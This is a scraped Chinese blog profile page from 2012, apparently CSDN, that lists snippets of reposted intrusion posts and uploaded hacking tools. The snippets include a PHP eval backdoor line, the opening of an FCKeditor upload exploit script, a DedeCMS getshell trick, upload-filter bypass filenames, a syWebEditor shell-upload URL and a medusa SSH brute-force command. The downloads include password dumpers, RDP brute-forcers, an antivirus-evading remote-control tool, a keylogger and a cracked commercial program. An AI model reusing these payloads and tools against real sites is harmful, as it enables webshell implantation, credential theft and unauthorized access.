自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(15)
  • 资源 (29)
  • 收藏
  • 关注

转载 提交’时提示ip被记录 防注入系统的利用。

很多朋友在入侵提权的时候都有会遇见,站点纪录了自己的IP。本文就教大家查看本机信息存在对方站点的漏洞,防止被利用例如:网址:http://www.92hack.net/newslist.asp?id=122′提示“你的操作已被记录!”等信息。利用方法:www.92hack.net/sqlin.asp 看是否存在,存在提交http://www.92hack.net

2012-04-23 10:34:29 1598

转载 FCKeditor 建立文件夹、上传文件时“.”变“_”的突破

FCKeditor 文件上传“.”变“_”下划线的绕过方法:这是网上公布的:很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shel

2012-04-22 16:48:13 1725

转载 分享一个判断dedecms版本的方法

访问/data/admin/ver.txt附加历史更新:20100708是最新版本5.620100324是5.520100429之后都是5.6版本,对应的日期为补丁的日期,可以知道什么漏洞没补5.6版本更新记录:2010-07-081.修复头像跨目录删除的bug2.UTF-8版本支付错误;2010-06-231.修复会员中心收藏夹错误

2012-04-22 16:47:39 617

转载 dedecms 5.7 一句话后门利用 exp

http://www.wooyun.org/bug.php?action=view&id=5416shopcar.class.php 被植入一句话@eval(file_get_contents('php://input'));去官网下了一套回来,看了下代码,class MemberShops{ var $OrdersId; var $productsId;

2012-04-22 16:43:31 1608

转载 在线渗透测试工具集合

家试试看吧,呵呵,不过下面那个破解wordpress密码的还能用在线端口扫描:http://scan.subhashdasyam.com/port-scanner.php在线VNC扫描:http://scan.subhashdasyam.com/dumper-with-login.php在线SSH扫描:http://scan.subhashdasya

2012-04-22 16:42:35 596

转载 fckeditor <= 2.6.4 任意文件上传漏洞

<?error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){ $sock = fsockopen(

2012-04-22 11:27:15 686

转载 FCKeditor-Exp通杀0day

error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock

2012-04-22 11:16:03 748

转载 @php一句话猥琐流搞法

在渗透中常常遇到拦截eval的,所以这种形式的会被拦截常见的是变成base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)这种形式可以绕过,另外还有其他形式    今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。 完了才知道是个webshell扫描工具。各位前辈把web后门弄的死

2012-04-20 22:08:45 1193

转载 webshell提权的重点目录总结

C:\Documents and Settings\All Users\「开始」菜单\程序\ --‘看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径。C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ --‘看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得

2012-04-20 22:01:24 821

转载 DEDECMS拿SHELL EXP

转自:t00ls网上流传的漏洞exp都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell  _1 U- t( B- F8 c前题条件,必须准备好自己的dede数据库,然后插入数据:insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'

2012-04-20 22:00:16 857

转载 文件上传字符截断与NC提交技巧

在得到网站后台的账号密码很多网站后台上传文件之后自动重名名。这里给大家提供一种老方法了。上传文件一般是upload.asp,upfile.asp,一般可以定义文件路径,也就是uppath,而一般程序会判定后缀的,比如限定不能等于asp,aspx,asa,那么可以传cdx、cer或php(服务器支持),或者判定只能是.jpg,.gif,那么就必须使用截断方式来处理了,这儿详细说明一下

2012-04-20 21:56:35 476

转载 syWebEditor的一个通杀漏洞

直接访问 /syWebEditor/UpImg.asp?isBack=&fileType=gif|jpg|png|asa|asp|mdb|&obj=L_Img&UpPath=/a.asp; 上传a.jpg后,shell在根目录下,名为a.asp;a.jpg 试了几个,都能成功,应该是通杀的...

2012-04-20 21:55:31 524

转载 Fckeditor漏洞总结

FCk的漏洞,本文会增加自己的经验以及网络收集的漏洞,集百家之所长。1、查看编辑器版本FCKeditor/_whatsnew.html FCKeditor/editor/dialog/fck_about.html2、Version 2.2 版本Apache+linux 环境下在上传文件后面加个.突破!测试通过。3、Version http://www.hackseo.n

2012-04-20 21:53:50 1464

转载 MS12-020:远程桌面中的漏洞可能允许远程代码执行:2012 年 3 月 13 日

受影响的软件 操作系统最大安全影响综合严重等级此更新替代的公告Windows XP Service Pack 3(KB2621440)远程执行代码严重MS11-065 中的 KB2570222 由 KB2621440 替代Windows XP Professi

2012-04-03 11:33:19 2614

转载 Linux远程ssh破解

1. 软件OS::CentOS release 5.2 (Final) (可通过cat /etc/issue查看)库:libssh2-1.2.7.tar.gz  http://www.libssh2.org/download/libssh2-1.2.6.tar.gzmedusa:medusa-2.0.tar.gz  wget http://www.foofus.net/jmk/tool

2012-04-01 16:31:42 997

全国省市区的plist文件

全国省市区的plist文件<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>北京市</key> <dict> <key>0</key> <dict> <key>北京市</key> <array> <string>东城区</string> <string>西城区</string> <string>朝阳区</string> <string>丰台区</string> <string>石景山区</string> <string>海淀区</string> <string>门头沟区</string> <string>房山区</string> <string>通州区</string> <string>顺义区</string> <string>昌平区</string> <string>大兴区</string> <string>怀柔区</string> <string>平谷区</string> <string>密云县</string> <string>延庆县</string> </array> </dict> </dict> </dict> </plist>

2015-01-12

VMware vSphere 4.1的BT种子

VMware vSphere 4.1BT的种子。1、在ESxserver中点击性能选项卡,可以很清楚的看到整个server或者单独的guest os对cpu、内存、network 、系统的资源占用情况。还可以为每个虚拟机分配保留的资源,也可以限制其最大使用的资源。 2、在vmware workstation中,当建立多个虚拟机,并且需要对外发布服务的时候,就会造成异常。而在ESX Server中,把每个网卡都虚拟成了一个多达64口的交换机,即使多个虚拟机共享一个网卡对外发布服务,都没有任何的问题。 3、支持虚拟机的自动启动。 当host主机需要reboot 时,主机启动后,可以设定主机上的虚拟机自动启动,而且可以采用延时启动的方式,比如间隔120s,逐个启动虚拟机,启动哪几个虚拟机也是可以设定的。 4、支持时间任务计划。可以设定在指定的时间执行任务,比如打开或者关闭虚拟机。一个可行的方案就是在早上8点打开某服务的虚拟机,而在下午六点半下班以后将虚拟机进入suspend状态。 5、支持多用户管理,可以添加多个用户帐号,进行ESX Server的管理,可以设定不同的用户权限,比如是admin还是power user ,比如是否可以建立虚拟机,是否具有关闭电源的权利等等。 6、支持虚拟机模板技术,可以将一个虚拟机clone 或者 convert 为一个 template ,比如,我们将一个RHEL的guest os转化为模板,当需要新建一台虚拟机的时候,只需要从这个template deploy出来即可。模板和虚拟机的转化是双向的。也可以将模板重新转化回虚拟机,这样的好处是可以保证模板永远是最新最使用的。 7、支持虚拟机的迁移,可以将一个虚拟机从一台ESx server转移到另外一台ESX server 。如果使用了Vmotion ,这个转移过程还可以是自动的,根据一些设定好的条件,如资源占用情况,是否宕机等等。当然,这种转移需要共享存储的支持。 8、可以通过VC控制台对存储空间进行管理,比如上传或者下载文件,在控制台界面中,默认的布局是host and cluster ,可以选择datastore,就可以看到存储界面了,可以常看其状态并进行文件管理。 9、ESX是支持存储的,无论是SAN还是NAS,可以用openfiler或者freenas来模仿SAN或者NAS。在ESX中,需要配置一个网卡作为vmkernel和存储通讯,还要在openfiler或者freenas中设置安全措施,或者允许的ip地址访问等等。 10、支持snapshot ,很方便的功能,对虚拟机做了snapshot后,任何时候都可以恢复到做snapshot时的系统状态,支持多个snapshot,相当于guest os有了一个时光机器。

2012-11-11

Kiwi Syslog v8.3.28 Crack 专业版破解

Kiwi Syslog v8.3.28 Crack 专业版破解

2012-11-05

Python标准库中文版

1. 核心模块 o 1.1. 介绍 o 1.2. _ _builtin_ _ 模块 o 1.3. exceptions 模块 o 1.4. os 模块 o 1.5. os.path 模块 o 1.6. stat 模块 o 1.7. string 模块 o 1.8. re 模块 o 1.9. math 模块 o 1.10. cmath 模块 o 1.11. operator 模块

2012-11-02

SqlmapNoPy.rar

下载:http://down.f4ck.net/soft/SqlmapNoPy.rar 一个是由论坛核心成员ettack制作的汉化版的sqlmap。

2012-08-01

sqlmap_cn.tar

分享2个修改版的sqlmap。 一个是由论坛核心成员uing07制作的win下的不需要py环境就能执行的sqlmap。

2012-08-01

phpv9.rar

phpcms V9最新漏洞利用工具 工具作者:B0y

2012-07-25

Findpassword

Findpassword找到系统密码,2003密码

2012-07-15

mdb解包.rar

mdb解包,解压webshell打包的文件

2012-07-10

74cmsexp_t00ls.rar

so… 直接向 admin_login.php?act=do_login 构造以下POST语句就能直接进后台了~~ 当然前提你得有后台路径:

2012-07-03

sqlmap-add8352.tar.gz

sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 桌, 专栏, 列举整个DBMS, 读了系统文件和利用导致SQL 射入弱点的网应用编程的安全漏洞。

2012-07-02

K8MSSQL.rar

程序:K8-MSSQL综合利用工具V1.0 语言:VS2010 C# (.NET Framework v2.0) 作者:拉登哥哥 QQ:396890445 更新历史: 2012-06-09 [+] BCP导出txt(可导出整个表) 秒脱百万/千万记录 测试导出CSDN 640W数据 仅需10-15秒 [+] 导出htm格式(可导出指定列) 只适合100W以下记录 [+] 修复空格(数据库名/表名/列名)不能导出的bug [+] 修复纯数字列名/字段不能的bug [+] 显示当前要导出表的记录总数

2012-07-02

sqlmap-0.9.zip

sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 桌, 专栏, 列举整个DBMS, 读了系统文件和利用导致SQL 射入弱点的网应用编程的安全漏洞。

2012-07-02

sqlmap-add8352

sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 桌, 专栏, 列举整个DBMS, 读了系统文件和利用导致SQL 射入弱点的网应用编程的安全漏洞。

2012-07-02

struts工具_95096

struts工具_95096漏洞利用工具,你们懂的。

2012-06-29

iis批量扫描工具

iis.rar 批量扫描工具 好久就想写了,今天有点时间,就把以前 的笔记整理一下 主要是针对shell 有 net work 权限 可以跨目录写入文件 但是不能浏览 找不到目标站的绝对路径的 一个技巧! 呵呵 找到用户名和绝对路径的关系 一个简单的批处理即可把VirtualHost几百个网站(一般是 180)全部写入一句话

2012-05-08

mimikatz_trunk.zip

密码嗅探技术,最近很流行的工具,很强大。

2012-05-03

mimikatz_trunk (2).zip

windows密码嗅探,很好的工具啦。

2012-05-03

Webkey_1.91.apk

通过电脑以WIFI无线方式登录Android安卓手机,就像Linux的SSH远程控制一样,可以在电脑浏览器中打开手机屏幕,并执行手机程序(打电话、发短信、上网等),还可以查看、操作SDCard的文件,获得GPS位置,截取手机屏幕,手机和电脑直接聊天等等。能实现这一功能的就是Webkey这款软件。

2012-05-02

logkeys-0.1.1a.tar.gz

linux下的键盘记录 分类: 工具 2012-05-02 15:00 0人阅读 评论(0) 收藏 编辑 删除 安装: wget http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz tar -xf logkeys-0.1.XX.tar.gz cd logkeys-0.1.XX ./configure make make check make install 使用: logkeys -s -u -o log.txt

2012-05-02

DUBrute_2.1

DUBrute_2.1,2.1的版本比2.0的版本稳定性要强,效果要更好些,以前用2.0进行爆破2003的系统可以成功,但是xp就成功不了,但是2.1的版本破解xp的3389效果也相当不错

2012-04-03

ms12-020压缩包

  本次Windows RDP服务的这个漏洞也使得攻击者控制用户服务器或者造成蓝屏 3月19日消息,Windows服务器近日被爆存在高危远程代码执行漏洞——MS12-020,微软公司把该漏洞级别定为最高级-严重(Critical),攻击者可以通过向远程桌面端口(端口号3389)发送特定的数据包获得管理员权限

2012-04-03

DUBrute_v2.0_rc3.rar

DUBrute_v2.0_rc3.rar,rc2的升级版,效果不错,专门破解3389的超强工具,工具压缩包里含有3389端口的扫描程序,此程序可批量扫描3389,破解3389

2012-04-02

Recton v2.6免杀加强版.exe

Recton v2.6免杀加强版 局域网在获得用户名密码的前提下,可以进行开启telnet,进程,种植等

2012-04-02

libssh2-1.2.7.tar.gz

安装libssh2-1.2.7 将libssh2-1.2.7.tar.gz拷贝到/tmp/目录下,解压为libssh2-1.2.7并进入该目录: 2.1 ./configure 2.2 make 2.3 make install

2012-04-01

medusa-2.0.tar.gz

渗透linux环境的网络,口令破解是必不可少的。接下来介绍一款优秀的口令破解工具,medusa-2.0.tar.gz 将字典(如brute.dic, p.dic)拷贝到目录/tmp/后,进入/tmp/目录,键入medusa可以看到其它帮助信息,根据帮助信息可以开始破解SSH.。e.g., (假设我们要破解的目标IP为192.168.10.126) [root@CentOS2 tmp]# medusa -h 192.168.10.126 -U brute.dic -P p.dic -t 7 -f -r 10 -M ssh

2012-04-01

RGSupplicant4.10_1026.rar

锐捷客户端破解版 可以使用代理等业务 不会掉线 这是农林大学的一个人做的

2012-03-30

利客联盟phpshell-2.0.rar

用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。

2012-03-30

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除